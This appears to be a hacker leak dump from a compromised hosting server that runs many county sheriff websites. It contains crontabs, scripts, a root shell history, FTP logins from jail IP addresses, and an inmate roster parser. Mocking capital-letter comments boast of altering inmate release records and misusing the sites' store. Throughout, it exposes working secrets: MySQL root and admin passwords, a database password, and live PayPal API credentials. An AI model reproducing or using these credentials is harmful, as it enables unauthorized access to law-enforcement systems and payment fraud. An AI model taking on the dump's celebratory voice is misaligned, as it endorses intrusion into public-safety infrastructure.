- */10 * * * * /usr/bin/php
- /var/www/vhosts/jonesso.com/home/parse.php >> /backup/JONMS_INMATE_ROSTER.log
- 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/prattcountysheriff.com/home/parse_roster.php >/dev/null 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/prattcountysheriff.com/home/parse_warrants.php >/dev/null 2>&1
- */15 * * * * /usr/bin/php
- /var/www/vhosts/jeffersoncountykssheriff.com/home/parse_roster.php >>
- /backup/jcsoks_inamte_parse_log.txt
- */5 * * * * /usr/bin/php
- /var/www/vhosts/stfranciscountysheriff.org/home/parse_pcv.php >/dev/null 2>&1
- */5 * * * * /usr/bin/php
- /var/www/vhosts/howardcountysheriffar.com/home/parse_pcv.php >/dev/null 2>&1
- 0 6 * * * /usr/bin/php
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin/publish_roster.php
- >/dev/null 2>&1
- 5 6 * * * /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/admin/modules/inmate_roster/
- publish.php >/dev/null 2>&1
- 10 6 * * * /usr/bin/php
- /var/www/vhosts/cherokeecountyalsheriff.com/httpdocs/admin/modules/inmate_roster
- /publish.php >/dev/null 2>&1
- 15 6 * * * /usr/bin/php
- /var/www/vhosts/lawrencecosheriff.com/httpdocs/admin/modules/inmate_roster/
- publish.php >/dev/null 2>&1
- 20 6 * * * /usr/bin/php
- /var/www/vhosts/tunicamssheriff.com/httpdocs/admin/modules/inmate_roster/publish
- .php >/dev/null 2>&1
- 30 6 * * * /usr/bin/php
- /var/www/vhosts/boonesheriff.com/httpdocs/admin/modules/inmate_roster/publish.
- php >/dev/null 2>&1
- 0 10 * * * /usr/bin/php
- /var/www/vhosts/prattcountysheriff.com/httpdocs/admin/modules/inmate_roster/
- publish.php >/dev/null 2>&1
- 25 6 * * * /usr/bin/php
- /var/www/vhosts/jocomosheriff.org/httpdocs/admin/modules/inmate_roster/publish.
- php >/dev/null 2>&1
- 40 6 * * * /usr/bin/php
- /var/www/vhosts/jeffersoncountykssheriff.com/httpdocs/admin/modules/
- inmate_roster/publish.php >/dev/null 2>&1
- 50 6 * * * /usr/bin/php
- /var/www/vhosts/jonesso.com/httpdocs/admin/modules/inmate_roster/publish.php
- >/dev/null 2>&1
- 50 5 * * * /usr/bin/php
- /var/www/vhosts/stfranciscountysheriff.org/httpdocs/admin/modules/inmate_roster/
- publish.php >/dev/null 2>&1
- 0 2 * * * /usr/bin/php
- /var/www/vhosts/marionsoal.com/httpdocs/admin/modules/inmate_roster/cron/cron.
- php
- 40 1 * * * /usr/bin/find /var/www/vhosts/ -mtime -1
- | /bin/grep -v statistics | /bin/grep -v counter 2>&1 | perl -wple 'BEGIN{print
- "Changed Web Files - New GoDaddy"}'| mail -s "Changed Web Files - GoDaddy" -c
- bnewman@bjmweb.com -c galexander@bjmweb.com -c markm@bjmweb.com root
- 0 * * * * /usr/bin/find
- /var/www/vhosts/*/httpdocs/uploads/*.php | grep -v -e
- "watermark_wanted_photo.php" -e "checkimages.php" | mail -s "Go Daddy - Upload
- Scanner" -c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root
- 0 1 * * * /backup/mail_logs/parse_mail_log.sh
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/grantcountyar.com/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/crosscountyar.org/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/izardhometownhealth.com/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/cityofwynne.com/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/boonecountyar.com/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/barrycountysheriff.com/httpdocs/cron/purge_wanted.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/izardcountyar.org/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/mosheriffs.com/httpdocs/cron/cron.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/stfranciscountysheriff.org/httpdocs/cron/purge_events.php
- 1 0 * * * /usr/bin/php
- /var/www/vhosts/knoxcountysheriffil.com/httpdocs/cron/purge_events.php
- */2 * * * * /usr/bin/php
- /var/www/vhosts/gra_upload_scanner.php >/dev/null 2>&1
- 0 1 * * *
- /var/www/vhosts/mostwantedwebsites.net/subdomains/code/httpdocs/search/cron.sh
- >/dev/null
- #
- # BCSD Site Search Cron
- 0 1 * * * cd
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/search/admin/spider.php -u
- http://baxtercountysheriff.com/ -r -n
- http://baxtercountysheriff.com/warrants.php?find=all >/dev/null 2>&1
- #
- # CRCSD Site Search Cron
- 5 1 * * * cd
- /var/www/vhosts/crosscountysheriff.org/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/search/admin/spider.php -u
- http://crosscountysheriff.org/ -r -n
- http://crosscountysheriff.org/warrants.php?find=all >/dev/null 2>&1
- #
- #
- # MCSD Site Search Cron
- 10 1 * * * cd
- /var/www/vhosts/marioncountysheriffar.com/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/marioncountysheriffar.com/httpdocs/search/admin/spider.php -u
- http://marioncountysheriffar.com/ -r -n
- http://marioncountysheriffar.com/warrants.php?find=all >/dev/null 2>&1
- #
- #
- # SFSOAR Site Search Cron
- 15 1 * * * cd
- /var/www/vhosts/stfranciscountysheriff.org/httpdocs/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/stfranciscountysheriff.org/httpdocs/search/admin/spider.php -u
- http://stfranciscountysheriff.org/ -r -n
- http://stfranciscountysheriff.org/warrants.php?find=all >/dev/null 2>&1
- #
- #
- # GCSOMS Site Search Cron
- 0 1 * * * cd
- /var/www/vhosts/georgecountymssheriff.com/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/georgecountymssheriff.com/httpdocs/search/admin/spider.php -u
- http://georgecountymssheriff.com/ -r -n
- http://georgecountymssheriff.com/warrants.php?find=all >/dev/null 2>&1
- #
- #
- # CPSOLA Site Search Cron
- 0 1 * * * cd
- /var/www/vhosts/cameronso.org/httpdocs/search/admin/ && /usr/bin/php
- /var/www/vhosts/cameronso.org/httpdocs/search/admin/spider.php -u
- http://cameronso.org/ -r -n http://cameronso.org/warrants.php?find=all
- >/dev/null 2>&1
- #
- #
- # MCSOGA Site Search Cron
- 0 1 * * * cd
- /var/www/vhosts/meriwethercountysheriff.org/httpdocs/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/meriwethercountysheriff.org/httpdocs/search/admin/spider.php -u
- http://meriwethercountysheriff.org/ -r -n
- http://meriwethercountysheriff.org/warrants.php?find=all >/dev/null 2>&1
- #
- 47 23 * * * /usr/sbin/ntpdate -b -s time.nist.gov
- #!/bin/sh
- PASSWORD=`cat /etc/psa/.psa.shadow`
- mysqldump -u admin -p$PASSWORD --all-databases --add-drop-table |gzip -v9 >
- /root/mysql_backup.sql.gz
- #!/bin/bash
- #
- # Scan for PHP in upload folders
- #
- MAILTO="-c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root"
- EXCLUDES="-e watermark_wanted_photo.php -e checkimages.php -e
- watermark_recalled_photo.php"
- lineify (){
- for i in $*
- do
- echo $i
- done
- }
- # testing
- #EXCLUDES="numnum"
- #MAILTO="jwiegand@bjmweb.com"
- #
- UHOH=$(/usr/bin/find /var/www/vhosts/*/httpdocs/uploads/*.php | \
- grep -v $EXCLUDES)
- if [ "${UHOH}xx" != "xx" ]
- then
- lineify $UHOH | mail -s "Go Daddy - Upload Scanner" $MAILTO
- fi
- // HARDCODED MYSQL ROOT PASSWORDS... THE SIGN OF ANY SECURE SYSADMIN
- # cat ~root/MASS_PASS/masspass.php
- <?php
- error_reporting(0);
- if(php_sapi_name() == 'cli' && empty($_SERVER['REMOTE_ADDR'])) {
- echo md5('Y9BNtSeb').PHP_EOL;
- //custom safe_query, should work like normal, just allows passing of custom
- connect
- function safe_query($q, $u='', $p='', $d='', $s='localhost'){
- $l = mysql_connect($s,$u,$p) or die("ERROR: Could not connect with USER:
- $u PASS: $p ".PHP_EOL.mysql_error);
- if($d != ''){
- mysql_select_db($d,$l) or die("ERROR: Could not select DATABASE:
- $d".PHP_EOL);
- }
- $r = mysql_query($q,$l)/* or die("ERROR: Could not execute QUERY: $q
- ".PHP_EOL.mysql_error()) */;
- return $r;
- }
- $GD_USER = 'admin';
- $GD_PASS = '8w667nHzx%XFXb';
- $GD_SERV = 'localhost';
- $options = getopt("n::o::");
- $query = 'SHOW DATABASES';
- $result = safe_query($query, $GD_USER, $GD_PASS, '', $GD_SERV);
- while($row = mysql_fetch_array($result,MYSQL_NUM)){
- $query = 'SELECT password FROM dymin_user WHERE username = "bjm"';
- $r = safe_query($query, $GD_USER, $GD_PASS, $row[0], $GD_SERV);
- echo $row[0].' - '.mysql_result($r,0,'password').PHP_EOL;
- if(isset($options['n']) && isset($options['o'])){
- //echo 'UPDATE dymin_user SET password =
- "'.mysql_escape_string($options['n']).'" WHERE username = "bjm" AND password =
- "'.mysql_escape_string($options['o']).'"'.PHP_EOL;
- safe_query('UPDATE dymin_user SET password =
- "'.mysql_escape_string($options['n']).'" WHERE username = "bjm" AND password =
- "'.mysql_escape_string($options['o']).'"', $GD_USER, $GD_PASS, '', $GD_SERV);
- }
- }
- }else{
- echo 'This script can only be ran from the command line!'.PHP_EOL;
- exit();
- }
- ?>
- // GOTTA MAKE SURE TO RM -RF THIS PART FIRST
- # ls -al /backup
- total 318424
- drwxr-xr-x 9 root root 4096 Jul 14 11:30 .
- drwxr-xr-x 26 root root 4096 Feb 22 22:21 ..
- -rw-r--r-- 1 root root 17015 Jul 14 2010 ActiveWarrantsList.txt.back
- -rw-r--r-- 1 root root 175 May 12 09:36 BCSD_PARSE_XML
- drwxrwxrwx 2 root root 4096 Jun 29 18:23 BOCS_WARRANTS
- drwxrwxrwx 2 root root 4096 Jun 29 18:24 CRCSD_WARRANTS
- -rwxrwxrwx 1 root root 20852332 Jul 22 22:20 JONMS_INMATE_ROSTER.log
- -rw-r--r-- 1 root root 90737 Mar 2 08:50 JONMS_INMATE_ROSTER.log.2.gz
- -rwxrwxrwx 1 root root 324196 Feb 7 09:20 JONMS_INMATE_ROSTER.log.gz
- -rwxrwxrwx 1 root root 286813 Oct 28 2010 JONMS_INMATE_ROSTER.log.gz.0
- -rwxrwxrwx 1 root root 88758 Aug 10 2010 JONMS_INMATE_ROSTER.log.gz.1
- -rw-r--r-- 1 root root 13864960 Apr 21 08:19 POALAC04212011.tar
- -rw-r--r-- 1 root root 10833920 Mar 7 16:53 POALAC_BACKUP.tar
- -rw-r--r-- 1 root root 13864960 Apr 20 16:09 POALAC_BACKUP_04202011.tar
- drwxrwxrwx 2 root root 4096 Jun 29 18:24 SFSOAR_WARRANTS
- -rw-r--r-- 1 root root 68177920 May 3 09:47 arsa.05032011.tar
- drwxr-xr-x 3 root root 4096 Apr 21 11:06 bcsd
- -rw-r--r-- 1 root root 55494137 Jul 22 22:20 crcsd_query_log.txt
- -rw-r--r-- 1 root root 1080247 Apr 7 13:05 crcsd_query_log.txt.04072011.gz
- -rwxrwxrwx 1 root root 4181055 Feb 7 09:25 crcsd_query_log.txt.gz
- -rw-r--r-- 1 root root 116504777 Jul 22 22:15 jcsoks_inamte_parse_log.txt
- -rw-r--r-- 1 root root 527887 Apr 7 13:00
- jcsoks_inamte_parse_log.txt.04072011.gz
- -rwxrwxrwx 1 root root 1568892 Feb 7 09:15 jcsoks_inamte_parse_log.txt.gz
- -rw-r--r-- 1 root root 411831 Sep 13 2010 jcsoks_inamte_parse_log.txt.gz.0
- -rwxrwxrwx 1 root root 736089 Feb 8 13:44 jcsoks_query_log.txt.gz
- -rw-r--r-- 1 root root 12029931 Jul 22 22:20 johms_parse_log.txt
- -rw-r--r-- 1 root root 52276 Jun 14 13:30 johms_parse_log.txt.06142011.gz
- -rw-r--r-- 1 root root 24206 Mar 18 10:55 johms_parse_log.txt.gz
- drwxr-xr-x 2 root root 4096 Jul 22 01:00 mail_logs
- drwxr-xr-x 4 root root 4096 Jul 6 2010 parse_logs
- drwx------ 13 root root 4096 Feb 23 00:50 snapshots
- -rw-r--r-- 1 root root 3680191 Jul 22 22:21 stoms_parse_log.txt
- -rw-r--r-- 1 root root 890880 Mar 2 09:18 z
- // NOW THIS LOOKS INTERESTING
- // YOU BETTER BELIEVE WE CALLED release_inmate() MORE THAN A FEW TIMES
- # cat /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- <?
- if(date('d') == '1' && date('H') < '2'){
- shell_exec('rm /backup/johms_parse_log.txt');
- }
- function safe_query($query){
- $link = mysql_connect('localhost','johms','4smhoj2');
- mysql_select_db('JOHMS',$link);
- return mysql_query($query,$link);
- }
- function parse_csv($filename,$target_table,$field_map){
- $file = file($filename);
- $inmates = array();
- foreach($file as $line_num => $line_data){
- $query = 'INSERT INTO '.$target_table.' SET ';
- $line_data = explode(',',$line_data);
- $i=0;
- $inmates[] = $line_data[0];
- foreach($field_map as $field_num => $db_field){
- if($db_field == 'booking_date'){
- $line_data[$field_num] =
- date('Y-m-d',strtotime($line_data[$field_num])).'", booking_time =
- "'.substr($line_data[$field_num],-8).'';
- //echo $line_data[$field_num],PHP_EOL;
- }
- if($i != 0){
- $query .= ', '.$db_field.' = "'.$line_data[$field_num].'"';
- }else{
- $query .= $db_field.' = "'.$line_data[$field_num].'"';
- }
- $i++;
- }
- //echo $query,PHP_EOL;
- safe_query($query);
- unset($query);
- }
- return $inmates;
- }
- function release_inmate($booking_num){
- $date = date("Y-m-d");
- $time = date("Hi");
- $query = "update dymin_jail_roster set release_date = '$date',
- release_time = '$time' where booking_num = '$booking_num'";
- safe_query($query);
- }
- function is_in_jail($booking_number){
- $query = "select booking_num from dymin_jail_roster where booking_num =
- '$booking_number'";
- $result = safe_query($query);
- $num = mysql_num_rows($result);
- if($num == ''){return false;}else{return true;}
- }
- function build_old_inmates(){
- $inmates = array();
- $r = safe_query('SELECT * FROM dymin_jail_roster WHERE release_date =
- ""');
- while($row = mysql_fetch_array($r)){
- $inmates[] = $row['booking_num'];
- }
- return $inmates;
- }
- function build_new_inmates(){
- $inmates = array();
- $file =
- file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt');
- foreach($file as $line => $data){
- $inmates[] = array_shift(explode(',',$data));
- }
- if(sizeof($inmates)<1){
- echo PHP_EOL,date('m/d/Y H:i:s'),' -- Roster File was
- Empty',PHP_EOL;
- die();
- }
- return $inmates;
- }
- function remove_old_inmates(){
- $now = time();
- $forty_eight_hours_ago = date('Y-m-d', mktime(0, 0, 0, date("m", $now)
- , date("d", $now)-2, date("Y", $now)));
- $query = "select booking_num, image1 from dymin_jail_roster where
- release_date <= '$forty_eight_hours_ago' and release_date != ''";
- $result = safe_query($query);
- while($row = mysql_fetch_array($result,MYSQL_ASSOC)){
- shell_exec('rm -f
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$row['image1
- ']);
- $query_charges = 'delete from dymin_jail_roster_charges where
- booking_num = "'.$row['booking_num'].'"';
- safe_query($query_charges);
- $query_inmate = 'delete from dymin_jail_roster where booking_num =
- "'.$row['booking_num'].'"';
- safe_query($query_inmate);
- }
- }
- $field_map[0] = 'booking_num';
- $field_map[2] = 'age';
- $field_map[3] = 'gender';
- $field_map[4] = 'race';
- $field_map[5] = 'first_name';
- $field_map[6] = 'middle_name';
- $field_map[7] = 'last_name';
- $field_map[8] = 'booking_date';
- $field_map[9] = 'arresting_agency';
- $field_map[10] = 'image1';
- if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt')
- && filesize('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt') !=
- '4096'){
- $OLDinmates = build_old_inmates();
- $NEWinmates = build_new_inmates();
- //print_r($OLDinmates);
- foreach($OLDinmates as $key => $booking_number){
- if(!in_array($booking_number,$NEWinmates)){
- echo $booking_number,PHP_EOL;
- print_r($NEWinmates);
- echo PHP_EOL;
- release_inmate($booking_number);
- }
- }
- safe_query('DELETE FROM dymin_jail_roster WHERE release_date = ""');
- parse_csv('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.
- txt','dymin_jail_roster',$field_map);
- }
- unset($field_map);
- $field_map[0] = 'booking_num';
- $field_map[1] = 'charge';
- $field_map[2] = 'bond';
- if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/
- RosterChargesExport.txt')){
- safe_query('DELETE FROM dymin_jail_roster_charges');
- safe_query('UPDATE dymin_jail_roster SET charges = "" WHERE release_date
- = ""');
- parse_csv('/var/www/vhosts/jocomosheriff.org/home/Export/
- RosterChargesExport.txt','dymin_jail_roster_charges',$field_map);
- $q = 'SELECT * FROM dymin_jail_roster_charges';
- $r = safe_query($q);
- while($row = mysql_fetch_array($r)){
- $q = 'UPDATE dymin_jail_roster SET charges =
- CONCAT(charges,"'.$row['charge'].'<br>") WHERE release_date = "" AND booking_num
- = "'.$row['booking_num'].'"';
- safe_query($q);
- //echo $q,PHP_EOL;
- }
- $q = 'SELECT * FROM dymin_jail_roster';
- $r = safe_query($q);
- while($row = mysql_fetch_array($r,MYSQL_ASSOC)){
- $q = 'UPDATE dymin_jail_roster SET bond = (SELECT sum(bond) FROM
- dymin_jail_roster_charges WHERE booking_num = "'.$row['booking_num'].'") WHERE
- booking_num = "'.$row['booking_num'].'" AND release_date = ""';
- safe_query($q);
- //echo $q,PHP_EOL;
- }
- }
- remove_old_inmates();
- if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt')
- ){
- $file = '/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt';
- $newfile =
- '/var/www/vhosts/jocomosheriff.org/home/export_backup/RosterExport_'.date('
- Y_m_d_His').'.txt';
- if (!copy($file, $newfile)) {
- echo "failed to copy $file...\n";
- }else{
- unlink('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.
- txt');
- if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/
- RosterChargesExport.txt')){
- unlink('/var/www/vhosts/jocomosheriff.org/home/Export/
- RosterChargesExport.txt');
- }
- }
- }
- //shell_exec('cp -rpufT
- /var/www/vhosts/jocomosheriff.org/home/Export/Images/
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
- //shell_exec('mogrify -resize 200x200
- /var/www/vhosts/jocomosheriff.org/home/Export/Images/*.jpg');
- //shell_exec('mogrify -resize 200x200
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/*.jpg');
- shell_exec('chmod -R 777
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
- shell_exec('chown -R root:root
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized');
- $files = scandir('/var/www/vhosts/jocomosheriff.org/home/Export/Images/');
- foreach($files as $k => $v){
- if(strpos($v,'.JPG') !== false || strpos($v,'.jpg') !== false){
- $q = 'SELECT * FROM dymin_jail_roster WHERE image1 LIKE "%'.$v.'%"';
- if(mysql_num_rows(safe_query($q)) > 0){
- if(!is_file('/var/www/vhosts/jocomosheriff.org/httpdocs/images/
- inmates/resized/'.$v)){
- shell_exec('cp -rpufT
- /var/www/vhosts/jocomosheriff.org/home/Export/Images/'.$v.'
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
- echo 'Copied -
- '.'/var/www/vhosts/jocomosheriff.org/home/Export/Images/'.$v.' TO
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v.PHP_EOL;
- }
- }else{
- //do nothing for now
- }
- }
- //echo $v.'<br>';
- }
- $files =
- scandir('/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
- foreach($files as $k => $v){
- if(strpos($v,'.JPG') !== false || strpos($v,'.jpg') !== false){
- $q = 'SELECT * FROM dymin_jail_roster WHERE image1 LIKE "%'.$v.'%"';
- if(mysql_num_rows(safe_query($q)) > 0){
- echo $v.' - Valid Image'.PHP_EOL;
- shell_exec('mogrify -resize 200x200
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
- }else{
- //shell_exec('rm -f
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
- //shell_exec('rm -f
- /var/www/vhosts/jocomosheriff.org/home/Export/'.$v);
- echo 'Removing - '.$v.PHP_EOL;
- }
- }
- //echo $v.'<br>';
- }
- echo PHP_EOL,date('m/d/Y H:i:s'),' -- Finished',PHP_EOL;
- ?>
- # last > last.txt; wc last.txt
- 78726 787247 6061786 last.txt
- // WHY YES THESE ARE JAIL IPS SYNCING THEIR INMATE ROSTER FILES TO THE WEB
- # head -n 5 last.txt
- jonms_sy ftpd8479 173.166.203.165 Sat Jul 23 14:43 - 14:43 (00:00)
- pcsoks_s ftpd8064 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
- pcsoks_s ftpd8056 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
- pcsoks_s ftpd8054 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
- jonms_sy ftpd3730 173.166.203.165 Sat Jul 23 14:28 - 14:28 (00:00)
- // JUST IN CASE ANYONE WANTED TO PLAY WITH THEIR ONLINE STORE. WE SURE DID
- # cat /var/www/vhosts/mosheriffs.com/httpdocs/checkout/constants.php
- <?php
- define('API_TEST_MODE',false);
- /****************************************************
- constants.php
- This is the configuration file for the samples.This file
- defines the parameters needed to make an API call.
- PayPal includes the following API Signature for making API
- calls to the PayPal sandbox:
- API Username sdk-three_api1.sdk.com
- API Password QFZCWN5HZM8VBG7Q
- API Signature A-IzJhZZjhg29XQ2qnhapuwxIDzyAZQ92FRP5dqBzVesOkzbdUONzmOU
- Called by CallerService.php.
- ****************************************************/
- /**
- # API user: The user that is identified as making the call. you can
- # also use your own API username that you created on PayPal's sandbox
- # or the PayPal live site
- */
- if(!API_TEST_MODE){
- define('API_USERNAME', 'info_api1.mosheriffs.com');
- }else{
- define('API_USERNAME', 'galexa_1252510976_biz_api1.bjmweb.com');
- }
- /**
- # API_password: The password associated with the API user
- # If you are using your own API username, enter the API password that
- # was generated by PayPal below
- # IMPORTANT - HAVING YOUR API PASSWORD INCLUDED IN THE MANNER IS NOT
- # SECURE, AND ITS ONLY BEING SHOWN THIS WAY FOR TESTING PURPOSES
- */
- if(!API_TEST_MODE){
- define('API_PASSWORD', 'X376UUNKW9C665M5');
- }else{
- define('API_PASSWORD', '1252510985');
- }
- /**
- # API_Signature:The Signature associated with the API user. which is generated
- by paypal.
- */
- if(!API_TEST_MODE){
- define('API_SIGNATURE',
- 'AJabrMjdeOUS3ztu4b5tguA358YTAyJmntUHr637CjsXE1pjKGM9MsOH');
- }else{
- define('API_SIGNATURE',
- 'AFcWxV21C7fd0v3bYYYRCpSSRl31AmSHW7t6qw42Zz2AE42uyKKvCZBA');
- }
- /**
- # Endpoint: this is the server URL which you have to connect for submitting your
- API request.
- */
- if(!API_TEST_MODE){
- define('API_ENDPOINT', 'https://api-3t.paypal.com/nvp');
- }else{
- define('API_ENDPOINT', 'https://api-3t.sandbox.paypal.com/nvp');
- }
- /**
- USE_PROXY: Set this variable to TRUE to route all the API requests through
- proxy.
- like define('USE_PROXY',TRUE);
- */
- define('USE_PROXY',FALSE);
- /**
- PROXY_HOST: Set the host name or the IP address of proxy server.
- PROXY_PORT: Set proxy port.
- PROXY_HOST and PROXY_PORT will be read only if USE_PROXY is set to TRUE
- */
- define('PROXY_HOST', '127.0.0.1');
- define('PROXY_PORT', '808');
- /* Define the PayPal URL. This is the URL that the buyer is
- first sent to to authorize payment with their paypal account
- change the URL depending if you are testing on the sandbox
- or going to the live PayPal site
- For the sandbox, the URL is
- https://www.sandbox.paypal.com/webscr&cmd=_express-checkout&token=
- For the live site, the URL is
- https://www.paypal.com/webscr&cmd=_express-checkout&token=
- */
- define('PAYPAL_URL',
- 'https://www.sandbox.paypal.com/webscr&cmd=_express-checkout&token=');
- /**
- # Version: this is the API version in the request.
- # It is a mandatory parameter for each API request.
- # The only supported value at this time is 2.3
- */
- define('VERSION', '59.0');
- ?><?
- session_start();
- include "../config/header.php";
- include "../admin/config/classes/training_academy.php";
- $ta = new training_class('academy');
- $page = new training_class('academy');
- ?>
- // HERE COMES THE BORING PART
- # cat ~root/.bash_history
- less
- /var/www/vhosts/crosscountysheriff.org/httpdocs/admin/modules/warrants/classes/
- warrant_parser.php
- ll
- cd /var/www/vhosts/stfranciscountysheriff.org/
- ll
- cd home/
- ll
- crontab -l
- crontab -l
- /usr/bin/php /var/www/vhosts/stfranciscountysheriff.org/home/warrant_parser.php
- ll
- cd /var/log/
- ll
- less messages | grep 'sfsoar'
- less messages | grep 'sf
- '
- less messages | grep 'stfrancis'
- less messages | grep '16610'
- less messages | grep 'Cross County'
- less messages | grep 'crosscounty'
- less messages | grep 'stfrancis'
- less messages | grep 'boonesheriff'
- l
- ll
- less secure | grep 'sfsoar'
- cd /var/www/vhosts/crosscountysheriff.org/
- cd home/
- ll
- cd Cross\ County/
- ll
- pwd
- cd /var/sql_logs/
- ll
- ll -h
- mkdir -m 755 backup
- ll
- gzip baxtercountysheriff.com
- ll
- gzip mosheriffs.com
- ll
- ll
- mv mosheriffs.com.gz backup/
- ll
- mv baxtercountysheriff.com.gz backup/
- ll
- cd backup/
- ll
- ll -h
- cd ..
- ll
- ll -h
- ll
- cd /var/www/vhosts/jocomosheriff.org/
- cd home/
- ll
- ll
- cd Export/
- ll
- cd Images/
- ll
- cd ..
- ll
- cd ..
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- ll
- vi parse_roster.php
- cd Export/
- ll
- cd Images/
- ll
- cd ..
- cd ..
- ll
- cd /var/www/vhosts/boonesheriff.com/
- ll
- cd home/
- ll
- less ActiveWarrantsList.txt
- top
- cd /var/www/vhosts/jocomosheriff.org/home/
- ll
- cd Export/
- ll
- cd ..
- ll
- vi parse_roster.php
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- vi /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- cd /var/www/vhosts/crosscountysheriff.org/
- ll
- cd home/
- ll
- cd Cross\ County/
- ll
- cd ..
- ll
- cd Cross\ County/
- ll
- less warrant_parser.php
- cd /backup
- ll
- mkdir -m 777 CRCSD_WARRANTS
- ll
- cd CRCSD_WARRANTS/
- ll
- pwd
- ll
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/warrant_parser.php
- ll
- less warrant_query.sql
- cd ..
- ll
- pwd
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/warrant_parser.php
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/warrant_parser.php
- cd CRCSD_WARRANTS/
- ll
- rm warrant_query.sql
- cd ..
- ll
- rm warrant_query.sql
- ll
- cd CRCSD_WARRANTS/
- ll
- ll
- ll -h
- ll
- ll
- ll
- cd ..
- mkdir -m 777 BOCS_WARRANTS
- ll
- mkdir -m 777 SFSOAR_WARRANTS
- ll
- du -sh
- du -sh ./
- du -sh ./*
- ll
- ll
- cd SFSOAR_WARRANTS/
- ll
- ll
- ll
- ll
- ll
- ll
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/stfranciscountysheriff.org/home/warrant_parser.php
- crontab -e
- ll
- cd /var/www/vhosts/crosscountysheriff.org/home/
- ll
- cd Cross\ County/
- ll
- ll -h
- ll
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/warrant_parser.php
- crontab -l
- /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php >/dev/null
- 2>&1
- ll
- cd /var/www/vhosts/boonesheriff.com/home/
- ll
- /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php
- ll
- /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php
- crontab -e
- postqueue -p
- postqueue -p
- postqueue -f
- ll
- ll
- less huh
- ll -rt
- ll -h
- ll -rth
- top
- ll
- less tat\ E
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -f
- postqueue -f
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -f
- postqueue -p
- top
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- ls
- cd bin
- ls
- cd ../scripts/
- ls
- rm logon.aspx\?url\=https\:%2F%2Fwebmail.bjmweb.com%2Fowa%2F\&reason\=0
- rm logon.aspx\?url\=https\:%2F%2Fwebmail.bjmweb.com%2Fowa%2F\&reason\=0
- ./backup-now.sh
- cd
- ls
- rm BACKUP092010.csv.gz
